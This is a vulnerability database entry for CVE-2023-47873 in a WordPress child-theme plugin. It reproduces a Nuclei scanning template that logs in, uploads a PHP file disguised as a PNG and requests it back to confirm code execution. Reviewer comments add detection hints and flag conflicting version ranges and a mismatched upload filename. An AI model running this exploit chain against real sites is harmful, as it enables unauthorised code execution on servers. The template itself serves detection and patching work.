CVE-2023-47873: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload

日期: 2025-08-01 | 影响软件: WordPress WP Child Theme Generator | POC: 已公开

漏洞描述

Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator. This issue affects WP Child Theme Generator from n/a through 1.0.9.

PoC代码[已公开]

# Nuclei template (http protocol, raw requests) for CVE-2023-47873.
# Defender summary: the steps below log in with supplied WordPress credentials,
# submit the plugin's child-theme creation form with a PHP file in the upload
# field, and then request that file from the new theme directory. The CVSS
# vector (PR:H) and the `authenticated` tag both record that valid
# high-privilege credentials are required; remediation per `info.remediation`
# is updating the plugin to 1.1.3 or later.
id: CVE-2023-47873

# NOTE(review): the affected-version statements in this template disagree —
# the name says "< 1.1.3", the description says "through 1.0.9" and the
# Patchstack references mention 1.0.8. 1.1.3 is the version given as fixed;
# confirm the exact affected range against the vendor / Patchstack advisory.
info:
  name: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload
  author: cysamu,Crux
  severity: critical
  description: |
    Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator- from n/a through 1.0.9.
  remediation: Update to version 1.1.3 or later
  reference:
    - https://github.com/certuscyber/cve-pocs/tree/main/CVE-2023-47873
    - https://patchstack.com/database/wordpress/plugin/wp-child-theme-generator/vulnerability/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability
    - https://en-ca.wordpress.org/plugins/wp-child-theme-generator/
    - https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-47873
    cwe-id: CWE-434
    epss-score: 0.17833
    epss-percentile: 0.94896
    cpe: cpe:2.3:a:wensolutions:wp_child_theme_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: wensolutions
    product: wp_child_theme_generator
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-child-theme-generator/"
  # `intrusive`: step 3 writes a file to the target (see the request comments below).
  tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce

# All four requests must succeed in order. Requests 1-3 carry `internal: true`
# matchers, so only the final check (request 4) is reported as a finding.
flow: http(1) && http(2) && http(3) && http(4)

# Randomised values so each run's artefacts are distinguishable in logs.
# `{{username}}` / `{{password}}` are not defined in this block and are
# presumably supplied by the scanner invocation — confirm before use.
variables:
  string: "{{to_lower(rand_base(8))}}"
  name: '{{to_lower(rand_text_alpha(6))}}'
  childauthor: "{{to_lower(rand_base(4))}}"
  description: "{{to_lower(rand_base(5))}}"
  filename: '{{to_lower(rand_text_alpha(6))}}'

http:
  # Step 1: log in through wp-login.php. Success is a 302 with an empty body
  # and a `wordpress_logged_in_` cookie in the response headers.
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'len(body)==0'
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in_")'
        condition: and
        internal: true

  # Step 2: load the plugin's admin page (themes.php?page=custom-child-theme)
  # and extract the `wp-easy-nonce` value that the form POST in step 3 needs.
  - raw:
      - |
        GET /wp-admin/themes.php?page=custom-child-theme HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Child Theme Gen")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="wp-easy-nonce" value="([0-9a-zA-Z]+)"
        part: body
        internal: true

  # Step 3 (the intrusive step): submit the child-theme creation form to
  # admin-post.php (action=child_theme) with a .php file in the `fileUpload`
  # part declared as image/png. Success is a 302 whose Location contains
  # `error_type=updated`.
  # Detection hint for defenders: multipart POSTs to /wp-admin/admin-post.php
  # with action=child_theme where a part's filename ends in .php while its
  # Content-Type claims an image type.
  - raw:
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8

        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childtheme"

        {{name}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="childauthor"

        {{childauthor}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="description"

        {{description}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="fileUpload"; filename="{(unknown)}.php"
        Content-Type: image/png

        <?php echo "{{string}}";?>
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="wp-easy-nonce"

        {{nonce}}
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="action"

        child_theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8
        Content-Disposition: form-data; name="custom-child-create"

        Create Child Theme
        ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "error_type=updated")'
        condition: and
        internal: true

  # Step 4: request screenshot.php from the newly created theme directory.
  # A 200 whose body contains the random marker from `{{string}}` confirms
  # server-side PHP execution — this is the reported finding. The uploaded
  # file presumably remains under /wp-content/themes/<name>/ afterwards;
  # remove it after authorised testing. Defenders can look for .php files
  # where a theme's screenshot image is expected.
  - raw:
      - |
        GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{{string}}")'
        condition: and
# NOTE(review): the digest below presumably signs the template content;
# comment changes may invalidate it for scanners that verify signatures.
# digest: 490a004630440220164dcc1bebbb09d703f44628904efcb10afdcc0b8d581b70225db30fc1ce96dd02202708ccd1251d2a517cfc40e4cd9eb0ae3d8e9cbae76fb09ab3dbbad7f3776f4a:922c64590222798bb761d5b6d8e72950